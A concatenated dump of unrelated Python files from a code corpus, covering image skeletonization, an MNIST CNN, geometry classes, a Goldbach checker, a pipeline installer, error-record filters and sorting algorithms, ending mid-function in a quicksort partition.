    # difference between the image and its opening until nothing remains.
    while True:
        open = cv.morphologyEx(img, cv.MORPH_OPEN, element)
        temp = cv.subtract(img, open)
        eroded = cv.erode(img, element)
        skel = cv.bitwise_or(skel, temp)
        img = eroded.copy()
        if cv.countNonZero(img) == 0:
            break
    # Heavily erode the original mask and keep only skeleton pixels inside it,
    # discarding skeleton branches close to the mask boundary.
    thresh_erode = cv.erode(thresh_erode, np.ones((7, 7), dtype=np.uint8), iterations=20)
    out = cv.bitwise_and(skel, thresh_erode)
    # Probe the left vertical segment (column 350, rows 300..600).
    for row in range(300, 601):
        if out[row][350] != 0:
            wh_pixels_left.append((row, 350))
    # Probe the right vertical segment (column 650, rows 300..600).
    for row in range(300, 601):
        if out[row][650] != 0:
            wh_pixels_right.append((row, 650))
    # Probe the top horizontal segment (row 300, columns 350..650).
    for col in range(350, 651):
        if out[300][col] != 0:
            wh_pixels_up.append((300, col))
    # find goal point — priority (checked last wins): left, then right, then up.
    if len(wh_pixels_up) > 0 and len(wh_pixels_left) == 0 and len(wh_pixels_right) == 0:
        goal_point = wh_pixels_up[0]
    if len(wh_pixels_right) > 0:
        goal_point = wh_pixels_right[0]
    if len(wh_pixels_left) > 0:
        goal_point = wh_pixels_left[0]
    wh_pixels_left.clear()
    wh_pixels_right.clear()
    wh_pixels_up.clear()
    return goal_point
|
993,560 | f31b44640ee418566c9de77451293063ffb08abf | """
Program 7
Write a program which takes 2 digits (X and Y) as input and generate a 2-dimensional array
The element value in the i-th row and j-th column of the array should be i*j.
The program should print the 2-dimensional array as output with X number of rows and Y number of columns
"""
def build_matrix(row_num, col_num):
    """Return a row_num x col_num 2-D list where cell (i, j) holds i * j."""
    return [[row * col for col in range(col_num)] for row in range(row_num)]


def main():
    """Read "X,Y" from the console and print the X-by-Y product grid."""
    # console input (two integers separated by a comma)
    input_str = input("Enter any 2 numbers:")
    # separating input numbers by comma to generate a list
    split_string = input_str.split(',')
    print(split_string)
    # converting the list of strings to ints
    dimensions = [int(x) for x in split_string]
    print(dimensions)
    # Bug fix: the original indexed into `multilist` without ever creating
    # it (NameError); build the 2-D array properly instead.
    multilist = build_matrix(dimensions[0], dimensions[1])
    # printing 2-D array
    print(multilist)


if __name__ == '__main__':
    main()
993,561 | e6480f7e21b7f592a20f32d0c371af81f3e674c1 | from utils import Utils
from vector import Vector
'''
Class responsible for a point with 3 coordinates.
'''
class Point3D:
    '''
    Init of Point3D class
    @param x coordinate x of point
    @param y coordinate y of point
    @param z coordinate z of point
    '''
    def __init__(self, x, y, z):
        # Coordinates are stored as an immutable (x, y, z) tuple.
        self.point = (x, y, z)
    '''
    Method that creates a vector from two points
    @param self actual object
    @param oPoint another Point3D instance
    @returns a Vector built from the tuple difference self.point - oPoint.point
    @raises TypeError if oPoint is not a Point3D
    '''
    def createVector(self, oPoint):
        if(isinstance(oPoint, Point3D)):
            # Utils.subtract3DTuples presumably returns the component-wise
            # difference tuple — confirm the sign convention in Utils.
            return Vector(Utils.subtract3DTuples(self.point, oPoint.point))
        raise TypeError("The argument have to be of type Point3D")
993,562 | 7e2632615656ceeef203a266f7c0e9c4ca4521cf | import torch
from torchvision import transforms # 数据预处理
from torchvision import datasets # 数据集获取
from torch.utils.data import DataLoader
# Preprocessing for MNIST images: convert to tensor and normalize with the
# dataset's standard mean/std (no need to dig deeper here).
transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.1307, ), (0.3081, ))])
# Load the training and test splits separately.
train_dataset = datasets.MNIST(root='../dataset/mnist/', train=True, download=True, transform=transform)
train_loader = DataLoader(dataset=train_dataset, shuffle=True, batch_size=64)
test_dataset = datasets.MNIST(root='../dataset/mnist/', train=False, download=True, transform=transform)
test_loader = DataLoader(dataset=test_dataset, shuffle=False, batch_size=64)  # no need to shuffle the test set
class Model(torch.nn.Module):
    """CNN for MNIST: two conv+maxpool stages followed by a 4-layer MLP head.

    Input: (N, 1, 28, 28) image batches; output: (N, 10) raw logits
    (CrossEntropyLoss applies the softmax itself).
    """
    def __init__(self):
        super(Model, self).__init__()
        self.convolution1 = torch.nn.Conv2d(in_channels=1, out_channels=10, kernel_size=5)
        self.convolution2 = torch.nn.Conv2d(in_channels=10, out_channels=20, kernel_size=5)
        self.maxpooling = torch.nn.MaxPool2d(kernel_size=2)
        # 320 = 20 channels * 4 * 4 spatial, after two (conv k=5, pool /2)
        # stages: 28 -> 24 -> 12 -> 8 -> 4.
        self.linear1 = torch.nn.Linear(in_features=320, out_features=160)
        self.linear2 = torch.nn.Linear(in_features=160, out_features=80)
        self.linear3 = torch.nn.Linear(in_features=80, out_features=40)
        self.linear4 = torch.nn.Linear(in_features=40, out_features=10)
        self.activate = torch.nn.Tanh()
    def forward(self,x):
        x = self.activate(self.maxpooling(self.convolution1(x)))
        x = self.activate(self.maxpooling(self.convolution2(x)))
        x = x.view(-1, 320)  # flatten to (N, 320) for the linear head
        x = self.activate(self.linear1(x))
        x = self.activate(self.linear2(x))
        x = self.activate(self.linear3(x))
        x = self.linear4(x)  # no final activation: raw logits for CrossEntropyLoss
        return x
model = Model()
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")  # prefer GPU when available
model.to(device)  # move the model parameters to the chosen device
criterion = torch.nn.CrossEntropyLoss()
optimizer = torch.optim.SGD(model.parameters(), lr=0.05, momentum=0.5)
def train(epoch):
    """Run one training epoch over train_loader, reporting loss every 300 batches."""
    running_loss = 0.0
    for batch_idx, data in enumerate(train_loader, 1):
        inputs, lables = data
        inputs, lables = inputs.to(device), lables.to(device)  # move the batch to the model's device
        outputs = model(inputs)
        loss = criterion(outputs, lables)
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
        running_loss += loss.item()
        if batch_idx % 300 == 299:  # report accumulated loss every ~300 batches
            # NOTE(review): enumerate starts at 1, so this fires at batch 299,
            # 599, ... — off-by-one vs. the usual start-at-0 idiom; confirm.
            print('[%d,%5d] loss: %3f' % (epoch+1, batch_idx+1, running_loss))
            running_loss = 0.0
def test():
    """Evaluate the model on test_loader and print the overall accuracy."""
    correct = 0
    total = 0
    with torch.no_grad():  # no gradients needed during evaluation
        for data in test_loader:
            inputs, lables = data
            inputs, lables = inputs.to(device), lables.to(device)  # move the batch to the model's device
            outputs = model(inputs)
            # dim=1: max over each row; first result is the value (ignored),
            # second is the argmax index, i.e. the predicted class
            _, predicted = torch.max(outputs.data, dim=1)
            total += lables.size(0)
            correct += (predicted == lables).sum().item()  # element-wise tensor comparison
    print('Accuracy on test set: %5f %%' % (100 * correct / total))
if __name__ == '__main__':
    # Train for 100 epochs, evaluating on the test set after each one.
    for epoch in range(100):
        train(epoch)
        test()
993,563 | 042b18cb58b839d2de5a205ad8af980b96bc2726 | import turtle
def make_squares(turt, size, num):
    """Draw `num` squares of side `size`, moving the turtle between them.

    After each square the turtle turns left once more, lifts the pen and
    advances 2*size so consecutive squares do not overlap.
    :param turt: a turtle.Turtle-like object
    :param size: side length of each square
    :param num: how many squares to draw (the original accepted but ignored it)
    """
    for _ in range(num):
        turt.pendown()
        for _ in range(4):
            turt.forward(size)
            turt.left(90)
        turt.left(90)
        turt.penup()
        turt.forward(2 * size)


if __name__ == '__main__':
    # Bug fixes vs. the original script: pendown() must be called on the
    # turtle instance (the bare call raised NameError), and the final call
    # used the undefined name make_square with too few arguments.
    wn = turtle.Screen()
    owen = turtle.Turtle()
    make_squares(owen, 20, 1)
993,564 | f1a88fc8809befa62284dd955baa35fe60bb4ce5 | '''
A script for searching through various possibilities with uncertainty model online learning, assuming
that we are modeling the uncertainty of the action model.
'''
import sys
sys.path.append('curiosity')
sys.path.append('tfutils')
import tensorflow as tf
from curiosity.interaction import train, environment, data, cfg_generation
import curiosity.interaction.models as models
from tfutils import base, optimizer
import numpy as np
import os
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-g', '--gpu', default = '0', type = str)
parser.add_argument('-ea', '--encarchitecture', default = 0, type = int)
parser.add_argument('-fca', '--fcarchitecture', default = 0, type = int)
parser.add_argument('-mbaa', '--mbaarchitecture', default = 0, type = int)
parser.add_argument('--umlr', default = 1e-3, type = float)
parser.add_argument('--actlr', default = 1e-3, type = float)
parser.add_argument('--loss', default = 0, type = int)
parser.add_argument('--tiedencoding', default = False, type = bool)
parser.add_argument('--heat', default = 1., type = float)
parser.add_argument('--egoonly', default = False, type = bool)
parser.add_argument('--zeroedforce', default = False, type = bool)
parser.add_argument('--optimizer', default = 'adam', type = str)
parser.add_argument('--batching', default = 'uniform', type = str)
parser.add_argument('--batchsize', default = 32, type = int)
parser.add_argument('--numperbatch', default = 8, type = int)
parser.add_argument('--historylen', default = 1000, type = int)
parser.add_argument('--ratio', default = 2 / .17, type = float)
parser.add_argument('--objsize', default = .4, type = float)
N_ACTION_SAMPLES = 1000
EXP_ID_PREFIX = 'chpp'
NUM_BATCHES_PER_EPOCH = 1e8
IMAGE_SCALE = (128, 170)
ACTION_DIM = 5
args = vars(parser.parse_args())
wm_arch_params = {
'encode_deets' : {'sizes' : [3, 3, 3, 3], 'strides' : [2, 2, 2, 2], 'nf' : [32, 32, 32, 32]},
'action_deets' : {'nf' : [256]},
'future_deets' : {'nf' : [512]}
}
wm_cfg= cfg_generation.generate_latent_marioish_world_model_cfg(image_shape = IMAGE_SCALE, act_loss_type = 'one_l2', include_previous_action = False, action_dim = ACTION_DIM, **wm_arch_params)
um_encoding_choices = [
{
'sizes' : [7, 3, 3, 3],
'strides' : [3, 2, 2, 2],
'num_filters' : [32, 32, 32, 32],
'bypass' : [0, 0, 0, 0]
}
]
um_mlp_choices = [
{
'num_features' : [50, 50, 1],
'nonlinearities' : [['crelu', 'square_crelu'], ['crelu', 'square_crelu'], 'identity'],
'dropout' : [None, None, None]
},
{
'num_features' : [10, 10, 1],
'nonlinearities' : [['crelu', 'square_crelu'], ['crelu', 'square_crelu'], 'identity'],
'dropout' : [None, None, None]
},
{},
{
'num_features' : [10, 10, 10, 1],
'nonlinearities' : [['crelu', 'square_crelu'], ['crelu', 'square_crelu'], ['crelu', 'square_crelu'], 'identity'],
'dropout' : [None, None, None, None]
},
]
mlp_before_action_choices = [
{
'num_features' : [500, 1],
'nonlinearities' : ['relu', 'relu']
},
{
'num_features' : [500, 1],
'nonlinearities' : ['relu', 'tanh']
}
]
um_loss_choices = [
models.l2_loss,
]
um_encoding_args = um_encoding_choices[args['encarchitecture']]
um_mlp_before_act_args = mlp_before_action_choices[args['mbaarchitecture']]
um_mlp_args = um_mlp_choices[args['fcarchitecture']]
um_cfg = {
'use_world_encoding' : args['tiedencoding'],
'encode' : cfg_generation.generate_conv_architecture_cfg(desc = 'encode', **um_encoding_args),
'mlp_before_action' : cfg_generation.generate_mlp_architecture_cfg(**um_mlp_before_act_args),
'mlp' : cfg_generation.generate_mlp_architecture_cfg(**um_mlp_args),
'heat' : args['heat'],
'wm_loss' : {
'func' : models.get_mixed_loss,
'kwargs' : {
'weighting' : {'action' : 1.0, 'future' : 0.0}
}
},
'loss_func' : um_loss_choices[args['loss']],
'loss_factor' : 1. / float(args['batchsize']),
'only_model_ego' : args['egoonly'],
'n_action_samples' : N_ACTION_SAMPLES
}
model_cfg = {
'world_model' : wm_cfg,
'uncertainty_model' : um_cfg,
'seed' : 0
}
lr_params = {
'world_model' : {
'act_model' : {
'func': tf.train.exponential_decay,
'learning_rate': args['actlr'],
'decay_rate': 1.,
'decay_steps': NUM_BATCHES_PER_EPOCH, # exponential decay each epoch
'staircase': True
},
'fut_model' : {
'func': tf.train.exponential_decay,
'learning_rate': args['actlr'],
'decay_rate': 1.,
'decay_steps': NUM_BATCHES_PER_EPOCH, # exponential decay each epoch
'staircase': True
}
},
'uncertainty_model' : {
'func': tf.train.exponential_decay,
'learning_rate': args['umlr'],
'decay_rate': 1.,
'decay_steps': NUM_BATCHES_PER_EPOCH, # exponential decay each epoch
'staircase': True
}
}
if args['optimizer'] == 'adam':
optimizer_class = tf.train.AdamOptimizer
optimizer_params = {
'world_model' : {
'act_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': optimizer_class,
'clip': True,
},
'fut_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': optimizer_class,
'clip': True,
}
},
'uncertainty_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': optimizer_class,
'clip': True,
}
}
elif args['optimizer'] == 'momentum':
optimizer_class = tf.train.MomentumOptimizer
optimizer_params = {
'world_model' : {
'act_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': optimizer_class,
'clip': True,
'momentum' : .9
},
'fut_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': optimizer_class,
'clip': True,
'momentum' : .9
}
},
'uncertainty_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': optimizer_class,
'clip': True,
'momentum' : .9
}
}
train_params = {
'updater_func' : train.get_latent_updater,
'updater_kwargs' : {
'state_desc' : 'depths1'
}
}
model_params = {
'func' : train.get_latent_models,
'cfg' : model_cfg,
'action_model_desc' : 'uncertainty_model'
}
one_obj_scene_info = [
{
'type' : 'SHAPENET',
'scale' : args['objsize'],
'mass' : 1.,
'scale_var' : .01,
'num_items' : 1,
}
]
which_batching = args['batching']
if which_batching == 'uniform':
dp_config = cfg_generation.generate_experience_replay_data_provider(batch_size = args['batchsize'], image_scale = IMAGE_SCALE, scene_info = one_obj_scene_info, history_len = args['historylen'], do_torque = False)
elif which_batching == 'objthere':
dp_config = cfg_generation.generate_object_there_experience_replay_provider(batch_size = args['batchsize'], image_scale = IMAGE_SCALE, scene_info = one_obj_scene_info, history_len = args['historylen'], do_torque = False, ratio = args['ratio'], num_gathered_per_batch = args['numperbatch'])
else:
raise Exception('Invalid batching argument')
load_and_save_params = cfg_generation.query_gen_latent_save_params(location = 'freud', prefix = EXP_ID_PREFIX, state_desc = 'depths1')
postprocessor_params = {
'func' : train.get_experience_replay_postprocessor
}
params = {
'model_params' : model_params,
'data_params' : dp_config,
'postprocessor_params' : postprocessor_params,
'optimizer_params' : optimizer_params,
'learning_rate_params' : lr_params,
'train_params' : train_params
}
params.update(load_and_save_params)
params['allow_growth'] = True
if __name__ == '__main__':
os.environ['CUDA_VISIBLE_DEVICES'] = args['gpu']
train.train_from_params(**params)
|
993,565 | 4e9fd5cde2e8b050e8a723f9a32e0b8ff0089042 | """
Create console program for proving Goldbach's conjecture.
Program accepts number for input and print result.
For pressing 'q' program successfully close.
Use function from Task 5.5 for validating input,
handle all exceptions and print user friendly output.
"""
from Session_7.Task_7_5 import check_number
def get_set_prime_numbers(number):
    """
    Return the set of all prime numbers up to and including `number`.

    Uses a sieve of Eratosthenes (O(n log log n)) instead of the original
    trial division against every previously found prime.  Returns an empty
    set for number < 2, matching the original behaviour.
    """
    if number < 2:
        return set()
    is_prime = [True] * (number + 1)
    is_prime[0] = is_prime[1] = False
    for candidate in range(2, int(number ** 0.5) + 1):
        if is_prime[candidate]:
            # Start at candidate^2: smaller multiples were already crossed off.
            for multiple in range(candidate * candidate, number + 1, candidate):
                is_prime[multiple] = False
    return {i for i, prime in enumerate(is_prime) if prime}
def check_goldbachs_conjecture(number, prime_numbers):
    """Find two primes from `prime_numbers` summing to `number`.

    Returns a string "n = p + q" for the first decomposition found, or None
    when no pair of primes adds up to `number`.
    """
    return next(
        (f"{number} = {p} + {number - p}"
         for p in prime_numbers
         if number - p in prime_numbers),
        None,
    )
def main():
    """Interactive loop: read numbers and print a Goldbach decomposition for each.

    'q' (any case) exits.  check_number (imported from Session_7.Task_7_5) is
    assumed to validate the raw input string — confirm its contract; invalid
    input is silently ignored and the prompt repeats.
    """
    while True:
        number = input("input a number to check Goldbach's conjecture (press 'q' to exit): ")
        if number.lower() == "q":
            break
        elif check_number(number):
            number = int(number)
            prime_numbers = get_set_prime_numbers(number)
            result = check_goldbachs_conjecture(number, prime_numbers)
            print(result)
    print("The program is completed")
if __name__ == '__main__':
main()
|
993,566 | 34960b3047b9bf5f267b92ee3d82a3d8dc3d3753 | # No one writes a perffect programme
# The act of finding and removing bugs from code is called recommendation
# How to debug properly
# 1. use linting -> linting allows us to find errors before running our code
# 2. use an ide or editor
# 3. learn to read errors
# 4. pdb -> python debugger -> favourite debugger (pdb.set_trace() -> stops here)
# pdb gives an interactive debugger -> you can type 'help' to list all the commands
# 'step' allows us to step through the code
import pdb
def add_numbers(n1, n2):
    """Return n1 + n2 — teaching example that pauses in the pdb debugger first."""
    pdb.set_trace()  # -> drops into the interactive debugger so you can step through
    return n1 + n2
result = add_numbers(10, 'hello')
print(result)
|
993,567 | 44d9775a5c94c59ba1ee4b062bd8b13f61c764a7 | from django.contrib import admin
from .models import Category,Doctor
# Register your models here
class CategoryAdmin(admin.ModelAdmin):
    """Admin config for Category: list name/slug, auto-fill slug from name."""
    list_display = ['name', 'slug']
    prepopulated_fields = {'slug': ('name',)}
admin.site.register(Category, CategoryAdmin)
class DoctorAdmin(admin.ModelAdmin):
    """Admin config for Doctor: list key fields, auto-fill slug from name."""
    list_display = ['name', 'slug', 'img','charge','category']
    prepopulated_fields = {'slug': ('name',)}
admin.site.register(Doctor,DoctorAdmin)
|
993,568 | 383c1cd76bdaa60b98fc5e9aef6cc002cbb36c32 | {
'extra_keys': (),
'file_ext': '.fits',
'filetype': 'dark',
'ld_tpn': 'acs_drk_ld.tpn',
'parkey': ('DETECTOR', 'CCDAMP', 'CCDGAIN'),
'parkey_relevance': {'ccdgain': '(DETECTOR != "SBC")', 'ccdamp': '(DETECTOR != "SBC")'},
'reffile_format': 'image',
'reffile_required': 'yes',
'reffile_switch': 'darkcorr',
'rmap_relevance': '(DARKCORR != "OMIT")',
'suffix': 'drk',
'text_descr': 'Dark Frame',
'tpn': 'acs_drk.tpn',
'unique_rowkeys': None,
}
|
993,569 | 025ee8681c6996f0bbf402cc17daba06d511ad2f | /Users/pmlee/anaconda3/lib/python3.6/shutil.py |
993,570 | 845e58d763118ae39f7d8bf37522c0655278f0c4 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Will install necessary dependencies, set up folders and download databases
# necessary to use the pipeline.
#
# Should be run using:
#
# python setup.py ( install | update | updatedb )
#
import os
import sys
import shutil
import stat
import subprocess
def main():
# Extract argument
try:
possible_arg = ['install', 'update', 'updatedb']
task = sys.argv[1].lower()
assert task in possible_arg
except:
print '\nArgument is invalid. Command must be one of the following:'
print ' sudo python setup.py install'
print ' python setup.py update'
print ' python setup.py updatedb\n'
sys.exit()
# Ig Database URL
db_url = ('ftp://ftp.ncbi.nih.gov/blast/executables/'
'igblast/release/database/human*')
#
# Install
#
if task == 'install':
# Check for sudo access
if not os.getenv("USER") == 'root':
print ('\nSuperuser access is required to install dependancies. ' +
'Run again with:')
print ' sudo python setup.py install\n'
sys.exit()
# Write project folders
folders = ['database', 'tmp', 'results', 'comparisons']
exist = []
for folder in folders:
if os.path.exists(folder):
exist.append(folder)
if len(exist) > 0:
resp = raw_input('This will overwrite the folders containing ' +
'any existing results. Would you like to ' +
'continue? (y/n)')
if resp == 'y':
for folder in exist:
shutil.rmtree(folder)
else:
print 'Exiting.'
return 1
for folder in folders:
os.mkdir(folder)
# Change folder permissions to 777
os.chmod(folder, stat.S_IRWXO)
# Download databases
ret = subprocess.call('wget -P ./database {0}'.format(db_url),
shell=True)
if not ret == 0:
print 'Failed to download Ig databases'
return 1
# Try to install dependancies
ret = subprocess.call(' '.join([
'apt-get install',
'git',
'ncbi-blast+',
'pypy',
'python-pip']), shell=True)
if not ret == 0:
print ('Dependancies were not succesfully installed. They may ' +
'need to be installed manually.')
return 1
# Install docopt using pip
ret = subprocess.call(' '.join([
'pip install docopt==0.6.1']), shell=True)
if not ret == 0:
print ('Docopt was not succesfully installed. Exiting.')
return 1
print 'Done.'
elif task == 'update':
# Try to git pull
ret = subprocess.call('git pull', shell=True)
if not ret == 0:
ret2 = subprocess.call('git fetch --all', shell=True)
ret3 = subprocess.call('git reset --hard origin/master',shell=True)
if not ret2 == 0 and ret3 == 0:
print 'Script was unable to update pipeline.'
return 1
print '\nPipeline updated.'
elif task == 'updatedb':
ret = subprocess.call('wget -P ./database {0}'.format(db_url),
shell=True)
if not ret == 0:
print 'Failed to update Ig databases'
return 1
print 'Done'
return 0
if __name__ == '__main__':
main()
|
993,571 | 555fa2a3ff410bbf67f750d1b8f61f3b7145a71d | # Array to hold all error objects used to test code
import datetime
class Error:
def __init__(self, contract_type, date, error_code):
self.contractType = contract_type
self.date = date
self.errorCode = error_code
def get_contract_type(self):
return self.contractType
def get_date(self):
return self.date
def get_error_code(self):
return self.errorCode
# Array containing Error records used for testing.
# Argument order is: contract_type, date, error_code.
# Contract types are long-term, medium-term, or short-term;
# error codes range over 60.8C1 .. 60.8C18.
errors = [
    # Bug fix: the first entry was a bare tuple, not an Error instance, so
    # every get_*() call on it raised AttributeError in the query helpers.
    Error("long-term", datetime.datetime(2015, 4, 12), "60.8C1"),
    Error("long-term", datetime.datetime(2015, 5, 15), "60.8C1"),
    Error("short-term", datetime.datetime(2018, 6, 17), "60.8C2"),
    Error("short-term", datetime.datetime(2016, 7, 19), "60.8C3"),
    Error("medium-term", datetime.datetime(2017, 8, 10), "60.8C4"),
    Error("medium-term", datetime.datetime(2015, 9, 13), "60.8C5"),
    Error("long-term", datetime.datetime(2013, 1, 22), "60.8C6"),
    Error("long-term", datetime.datetime(2014, 4, 25), "60.8C7"),
    Error("short-term", datetime.datetime(2017, 3, 27), "60.8C8"),
    Error("short-term", datetime.datetime(2018, 5, 29), "60.8C9"),
    Error("short-term", datetime.datetime(2019, 6, 12), "60.8C10"),
    Error("short-term", datetime.datetime(2020, 7, 2), "60.8C11"),
    Error("medium-term", datetime.datetime(2014, 7, 4), "60.8C12"),
    Error("medium-term", datetime.datetime(2016, 3, 6), "60.8C13"),
    Error("long-term", datetime.datetime(2017, 9, 9), "60.8C14"),
    Error("short-term", datetime.datetime(2013, 10, 24), "60.8C15"),
    Error("short-term", datetime.datetime(2016, 12, 23), "60.8C16"),
    Error("medium-term", datetime.datetime(2012, 11, 14), "60.8C17"),
    Error("medium-term", datetime.datetime(2015, 2, 2), "60.8C18"),
    Error("long-term", datetime.datetime(2016, 3, 9), "60.8C1"),
    Error("long-term", datetime.datetime(2017, 4, 3), "60.8C2"),
    Error("short-term", datetime.datetime(2018, 5, 15), "60.8C3"),
    Error("short-term", datetime.datetime(2019, 6, 25), "60.8C4"),
    Error("short-term", datetime.datetime(2018, 7, 12), "60.8C5"),
    Error("short-term", datetime.datetime(2019, 8, 16), "60.8C6"),
    Error("medium-term", datetime.datetime(2020, 9, 19), "60.8C7"),
    Error("medium-term", datetime.datetime(2019, 10, 5), "60.8C8"),
]
def get_errors_by_date(a, d1, d2):
    """Return the errors in `a` whose date lies in the inclusive range [d1, d2].

    :param a: iterable of Error objects
    :param d1: start of the date range (datetime.datetime), inclusive
    :param d2: end of the date range (datetime.datetime), inclusive
    """
    return [err for err in a if d1 <= err.get_date() <= d2]
def get_errors_by_contract_type(a, c_type):
    """Return the errors in `a` whose contract type equals `c_type`.

    :param a: iterable of Error objects
    :param c_type: 'short-term', 'medium-term' or 'long-term'
    """
    return [err for err in a if err.get_contract_type() == c_type]
def get_errors_by_error_type(a, e_type):
    """Return the errors in `a` whose error code equals `e_type`."""
    return [err for err in a if err.get_error_code() == e_type]
def get_errors_by_error_type_and_date(a, d1, d2, e_type):
    """Return errors matching error code `e_type` with date in [d1, d2] inclusive."""
    return [err for err in a
            if d1 <= err.get_date() <= d2 and err.get_error_code() == e_type]
# Returns array of errors based on error type and contract type
def get_errors_by_contract_type_and_error_type(a, c_type, e_type):
    """Return errors matching both contract type `c_type` and error code `e_type`."""
    errors_by_contract_type_and_error_type = []
    for x in a:
        # Bug fix: get_contract_type was compared without being called, so the
        # bound method never equalled the string and the result was always [].
        if x.get_contract_type() == c_type and x.get_error_code() == e_type:
            errors_by_contract_type_and_error_type.append(x)
    return errors_by_contract_type_and_error_type
# Returns array of errors based on date and contract type
def get_errors_by_contract_type_and_date(a, d1, d2, c_type):
    """Return errors matching contract type `c_type` with date in [d1, d2] inclusive."""
    errors_by_contract_type_and_date = []
    for x in a:
        # Bug fix: get_contract_type was compared without being called (bound
        # method vs. string), so no record could ever match.
        if (d1 <= x.get_date() <= d2) and x.get_contract_type() == c_type:
            errors_by_contract_type_and_date.append(x)
    return errors_by_contract_type_and_date
# Returns array of errors based on date, error, and contract type
def get_errors_by_contract_and_error_type_and_date(a, d1, d2, c_type, e_type):
    """Return errors matching date range [d1, d2], contract type *c_type*
    and error code *e_type* simultaneously.

    Fix vs. original: ``x.get_contract_type`` was compared without being
    called (missing parentheses), so the filter never matched anything.
    """
    return [
        x for x in a
        if (d1 <= x.get_date() <= d2
            and x.get_contract_type() == c_type
            and x.get_error_code() == e_type)
    ]
# UNIT TEST def get_errors_by_date(a, d1, d2):
# NOTE(review): `errors` and `datetime` are not defined anywhere in this
# chunk; this smoke test presumably relies on definitions earlier in the
# file (an `errors` fixture list and `import datetime`) — verify.
t1 = get_errors_by_date(errors, datetime.datetime(2015, 1, 1), datetime.datetime(2019, 1, 1))
for x in t1:
    print(x)
# UNIT TEST def get_errors_by_contract_type(a, c_type):
# UNIT TEST def get_errors_by_error_type(a, e_type):
# UNIT TEST def get_errors_by_error_type_and_date(a, d1, d2, e_type):
# UNIT TEST def get_errors_by_contract_type_and_error_type(a, c_type, e_type):
# UNIT TEST def get_errors_by_contract_type_and_error_type(a, c_type, e_type):
# UNIT TEST def get_errors_by_contract_type_and_date(a, d1, d2, c_type):
# UNIT TEST def get_errors_by_contract_and_error_type_and_date(a, d1, d2, c_type, e_type):
|
993,572 | 198bf6639f423d30211d4f90bf336c5e28d7d46f | # -*- coding: utf-8 -*-
"""
Created on Thu Jan 04 13:52:07 2018
@author: whuang67
"""
###### Bubble Sort ########################
def bubble_sort(arr):
    """Sort *arr* in place, ascending, by repeatedly swapping adjacent
    out-of-order pairs; each pass bubbles the largest remaining value
    to the end of the unsorted region."""
    for limit in range(len(arr) - 1, 0, -1):
        for k in range(limit):
            if arr[k] > arr[k + 1]:
                arr[k], arr[k + 1] = arr[k + 1], arr[k]
###### Selection Sort ########################
def selection_sort(arr):
    """Sort *arr* in place, ascending: for each slot i, find a minimum of
    the remaining suffix and swap it into position i."""
    n = len(arr)
    for i in range(n):
        smallest = min(range(i, n), key=arr.__getitem__)
        arr[i], arr[smallest] = arr[smallest], arr[i]
def selection_sort2(arr):
    """Sort *arr* in place, ascending: for each trailing slot, find a
    maximum of the remaining prefix and swap it into place."""
    for end in range(len(arr) - 1, 0, -1):
        largest = max(range(end + 1), key=arr.__getitem__)
        arr[end], arr[largest] = arr[largest], arr[end]
###### Insertion Sort ########################
def insertion_sort(arr):
    """Sort *arr* in place, ascending (stable insertion sort)."""
    for i in range(1, len(arr)):
        val = arr[i]
        j = i
        # shift strictly-larger elements one slot right until val's spot is found
        while j > 0 and arr[j - 1] > val:
            arr[j] = arr[j - 1]
            j -= 1
        arr[j] = val
###### Shell Sort ########################
def shell_sort(arr):
    """Sort *arr* in place using Shell's method (gap halves each round).

    Fix vs. original: ``len(arr)/2`` produces a float under Python 3 and
    ``range()`` then raises TypeError; use floor division instead.
    """
    sublistcount = len(arr) // 2
    while sublistcount > 0:
        for start in range(sublistcount):
            gap_insertion_sort(arr, start, sublistcount)
        sublistcount //= 2

def gap_insertion_sort(arr, start, gap):
    """Insertion-sort the interleaved sublist arr[start::gap] in place.

    Fix vs. original: the shift loop compared ``arr[position-gap]`` against
    ``arr[position]`` — a slot already overwritten by the previous shift —
    instead of the value being inserted, which stopped the shift too early
    and produced incorrectly sorted output.
    """
    for i in range(start + gap, len(arr), gap):
        current_value = arr[i]
        position = i
        # shift larger sublist members right by one gap step
        while position >= gap and arr[position - gap] > current_value:
            arr[position] = arr[position - gap]
            position -= gap
        arr[position] = current_value
###### Merge Sort ########################
def merge_sort(arr):
    """Sort *arr* in place, ascending, via top-down merge sort.

    Fix vs. original: removed the stray debug ``print(arr)`` that fired on
    every recursive merge, spamming stdout once per sub-array.
    """
    if len(arr) > 1:
        mid = len(arr) // 2
        lefthalf = arr[:mid]
        righthalf = arr[mid:]
        merge_sort(lefthalf)
        merge_sort(righthalf)
        i = j = k = 0
        # merge the two sorted halves back into arr
        while i < len(lefthalf) and j < len(righthalf):
            if lefthalf[i] < righthalf[j]:
                arr[k] = lefthalf[i]
                i += 1
            else:
                arr[k] = righthalf[j]
                j += 1
            k += 1
        # drain whichever half still has elements
        while i < len(lefthalf):
            arr[k] = lefthalf[i]
            i += 1
            k += 1
        while j < len(righthalf):
            arr[k] = righthalf[j]
            j += 1
            k += 1
###### Quick Sort ########################
def quick_sort(arr):
    """Sort *arr* in place, ascending; delegates to the recursive helper
    over the full index range [0, len(arr)-1]."""
    quick_sort_help(arr, 0, len(arr)-1)
def quick_sort_help(arr, first, last):
    """Recursively quicksort arr[first..last] (inclusive) in place.

    Fix vs. original: the left recursion started at ``0`` instead of
    ``first``, so every recursive call re-partitioned already-finished
    prefixes of the array (the output was accidentally still sorted, but
    with needless extra work).
    """
    if first < last:
        splitpoint = partition(arr, first, last)
        quick_sort_help(arr, first, splitpoint - 1)
        quick_sort_help(arr, splitpoint + 1, last)

def partition(arr, first, last):
    """Partition arr[first..last] around pivot arr[first]; return the
    pivot's final index. Elements <= pivot end up left of it, >= right."""
    pivotvalue = arr[first]
    leftmark = first + 1
    rightmark = last
    done = False
    while not done:
        # advance leftmark past elements <= pivot
        while leftmark <= rightmark and arr[leftmark] <= pivotvalue:
            leftmark += 1
        # retreat rightmark past elements >= pivot
        while arr[rightmark] >= pivotvalue and rightmark >= leftmark:
            rightmark -= 1
        if rightmark < leftmark:
            done = True
        else:
